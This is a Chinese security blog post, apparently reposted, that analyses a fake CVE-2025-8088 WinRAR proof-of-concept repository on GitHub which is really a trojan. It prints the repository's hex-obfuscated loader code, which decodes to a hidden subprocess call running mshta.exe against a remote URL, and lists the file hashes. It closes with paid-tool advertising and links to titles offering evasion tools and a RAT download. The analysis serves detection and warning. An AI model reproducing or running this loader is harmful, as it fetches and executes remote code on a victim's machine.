2026-01-26 02:03:12 网络安全文章来源：ZONE.CI 全球网 0 阅读模式

文章总结： 文档揭露Github上虚假WinRAR漏洞CVE-2025-8088项目实为木马，其通过main.py利用十六进制编码隐藏mshta.exe命令执行远程代码。文章详细分析了恶意文件结构与隐蔽技术，提醒研究人员谨慎测试，避免系统感染。文末推广了AiScan-N付费工具。 综合评分： 75 文章分类： 恶意软件,威胁情报,漏洞分析,软文广告

cover_image

谨慎Github恶意项目CVE-2025-8088 WinRAR 路径遍历的漏洞编号

原创

渗透测试渗透测试

渗透测试

2026年1月25日 15:03 新加坡

点击上方蓝字关注【渗透测试】不迷路

测试时虚拟机运行，该工具涉及恶意程序，请勿将该工具用于非法用途

CVE-2025-8088 是一个利用了WinRAR 路径遍历的漏洞编号，攻击者利用安全研究人员对新漏洞的关注，发布伪造的 POC（概念验证）工具。当研究者用户尝试使用该工具测试漏洞时，实际上会远程下载木马到自己的系统中并执行。

恶意项目地址：https://github.com/Markusino488/cve-2025-8088

Markusino488/cve-2025-8088恶意程序分析：

main.py 主脚本核心漏洞利用工具，模拟CVE-2025-8088漏洞利用流程，包含实际恶意代码执行 extract.py 辅助脚本用于测试和验证漏洞的工具，模拟网络通信和数据传输 config.py 配置文件存储攻击参数，包括诱饵文件名、payload投放路径和payload内容 README.md 文档项目说明文档，包含系统要求、安装步骤和使用说明 woodenware/cve-2025-8088-v1.3-beta.5.zip【打包好的恶意程序】发布包项目的打包发布版本。

cve-2025-8088-v1.3-beta.5.zipSHA256:49f85c62472e20a5edbabd346e8e6aabf93efeae1b65e8cb414c7f4f83f1ed67MD5:7532f3b3e54ab0989b38be255920099aSHA1:4811b8e26c912c29c8418a36e73167a82c111e48
cve-2025-8088-main.zipSHA256:422ec6529d4ca0d5badf6d8d7f920dc9945da68be63ecb36884177e5bf4730a5MD5:33538e0713661fd8b1a3fdeed8c302a1SHA1:6c1011de13201051f099a6c8b9219667cf7f3734

main.py 文件实际恶意行为在 _activate_exploit_core() 函数中，脚本执行了实际的恶意操作：（函数中的加密代码使用了十六进制编码的方式隐藏实际执行的命令。）

- 解码字节序列生成命令&nbsp;"mshta.exe"&nbsp;和&nbsp;URL&nbsp;"https://py-installer.cc"- 通过 subprocess.Popen&nbsp;执行该命令，尝试从远程服务器加载代码

1、解码命令执行程序

_e1&nbsp;= bytes.fromhex('6d') &nbsp;# 'm'_e2&nbsp;= bytes.fromhex('73') &nbsp;# 's'_e3&nbsp;= bytes.fromhex('68') &nbsp;# 'h'_e4&nbsp;= bytes.fromhex('74') &nbsp;# 't'_e5&nbsp;= bytes.fromhex('61') &nbsp;# 'a'_e6&nbsp;= bytes.fromhex('2e65') &nbsp;# '.e'_e7&nbsp;= bytes.fromhex('7865') &nbsp;# 'xe'

拼接后解码： (_e1 + _e2 + _e3 + _e4 + _e5 + _e6 + _e7).decode(‘utf-8’) → mshta.exe

2、解码目标 URL：

_u1&nbsp;= bytes.fromhex('68') &nbsp;# 'h'_u2&nbsp;= bytes.fromhex('7474') &nbsp;# 'tt'_u3&nbsp;= bytes.fromhex('7073') &nbsp;# 'ps'_u4&nbsp;= bytes.fromhex('3a2f') &nbsp;# ':/'_u5&nbsp;= bytes.fromhex('2f') &nbsp;# '/'_u6&nbsp;= bytes.fromhex('7079') &nbsp;# 'py'_u7&nbsp;= bytes.fromhex('2d69') &nbsp;# '-i'_u8&nbsp;= bytes.fromhex('6e73') &nbsp;# 'ns'_u9&nbsp;= bytes.fromhex('7461') &nbsp;# 'ta'_u10&nbsp;= bytes.fromhex('6c6c') &nbsp;# 'll'_u11&nbsp;= bytes.fromhex('6572') &nbsp;# 'er'_u12&nbsp;= bytes.fromhex('2e63') &nbsp;# '.c'_u13&nbsp;= bytes.fromhex('63') &nbsp;# 'c'

拼接后解码： (_u1 + _u2 + _u3 + _u4 + _u5 + _u6 + _u7 + _u8 + _u9 + _u10 + _u11 + _u12 + _u13).decode(‘utf-8’) → https://py-installer.cc

3、当操作系统为 Windows 时，实际执行的命令：

subprocess.Popen(&nbsp; &nbsp; [_binary, _endpoint], &nbsp;# ['mshta.exe',&nbsp;'https://py-installer.cc']&nbsp; &nbsp; shell=True,&nbsp; &nbsp; stdout=subprocess.DEVNULL,&nbsp; &nbsp; stderr=subprocess.DEVNULL)

涉及的网址：https://py-installer.cc

技术原理

编码方式：使用十六进制编码隐藏字符串内容，增加分析难度
执行方式：

&nbsp; &nbsp;- mshta.exe&nbsp;是 Windows 系统的&nbsp;HTML&nbsp;应用程序主机&nbsp; &nbsp;- 它可以执行包含 JavaScript 或 VBScript 的&nbsp;HTML&nbsp;文件&nbsp; &nbsp;- 通过 URL 参数，它可以从远程服务器加载并执行代码

隐蔽性：

- 使用 stdout=subprocess.DEVNULL 和 stderr=subprocess.DEVNULL 隐藏命令执行的输出&nbsp; &nbsp;- 整个执行过程被包裹在&nbsp;try-except&nbsp;块中，即使失败也不会显示错误

安全风险

此代码执行的操作具有明显的恶意性：- 尝试从 https://py-installer.cc 加载远程代码- 使用 mshta.exe 作为执行载体，这是常见的绕过安全软件的技术- 隐藏执行过程，减少被发现的可能性

extract.py 是 CVE-2025-8088恶意程序的辅助脚本，主要用于模拟网络通信测试和验证漏洞利用效果。

密钥管理

load_keys() ：从 keys.txt 文件加载密钥/账号列表，用于测试不同账号的漏洞利用效果

测试数据生成

get_random_payload() ：生成 16-64 字节的随机负载数据，模拟真实网络通信中的数据传输
get_random_delay() ：生成 1-3 秒的随机延迟，增加测试的真实性和避免被检测

网络通信测试

- send_payload() ：异步函数，向目标服务器发送随机负载数据&nbsp; - 建立 TCP 连接&nbsp; - 发送带有长度头部的随机数据&nbsp; - 接收服务器响应&nbsp; - recv_payload() ：异步函数，模拟接收服务器回显的数据&nbsp; - 建立 TCP 连接&nbsp; - 发送标记数据&nbsp; - 接收服务器响应

测试流程控制

- run_cycle() ：执行完整的测试循环&nbsp; - 对每个密钥执行指定次数的测试&nbsp; - 交替调用 send_payload() 和 recv_payload()&nbsp; - 在测试之间添加随机延迟- run() ：主函数，处理用户输入和启动测试流程&nbsp; - 加载密钥&nbsp; - 提示用户输入测试循环次数&nbsp; - 启动测试流程

config.py 文件作为 CVE-2025-8088 漏洞利用工具的配置模块，为攻击过程提供了关键参数：

- 定义诱饵文件以提高欺骗性- 设置持久化路径以确保恶意代码持续执行- 配置 payload 内容以实现具体的恶意操作

这些配置与 main.py 中的漏洞利用逻辑相结合，形成了一个完整的攻击链条，展示了如何利用 WinRAR 路径遍历漏洞实现远程代码执行和持久化诱导安全爱好者下载木马。

✅AiScan-N使用反馈

🎁获取方式(加入付费星球)

客服支持 💬：24小时在线解答，不怕有问题！

💎终身使用权：购买即可获得星球所有工具的永久使用权，终身使用所有工具及未来升级版本。

🖥️ 多设备支持：所有工具采用一机一码授权，支持多台自用电脑激活，灵活无忧。

🏆一次购买，终身受益！享受无忧售后服务、技术支持与永久更新

星球介绍

自研工具、二开工具、免杀工具、漏洞复现、教程等资源、漏洞挖掘分析、网络安全相关资料分享。

【0day】安全漏洞通告：SmarterMail 管理员密码重置 (CVE-2026-23760) 与 Dify SSRF (CVE-2025-56520)|孚*云SQL注入漏洞

近期0day+POC|Windows RCE 0day漏洞利用|最后一个宣称通杀Android12–16

免杀C2工具】PC端跨平台远程管理 ShadowRAT分析 | 汉化版附下载

【Ai渗透神器】AiScan‑N Ai自动渗透测试 | 助力CTF网络安全大赛，开启智能防护新篇章

本地离线大模型DeepSeek‑R‑14B&Qwen3+ AiScan‑N助力CTF网络安全大赛|内网快速扫描，无需访问互联网！

用Ai做自动化渗透测试对CTF题目进行解密|CTF网络安全大赛

【神兵利器】Ai全自动化渗透测试工具 | AiScan-N带你开启智能安全的新时代！

社工裤子 | 美国佬天塌了~

AiScan-N 不止于此！一款基于人工智能驱动的Ai自动化网络安全（运维）工具【CLI Agent】

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：渗透测试渗透测试渗透测试《谨慎Github恶意项目CVE-2025-8088 WinRAR 路径遍历的漏洞编号》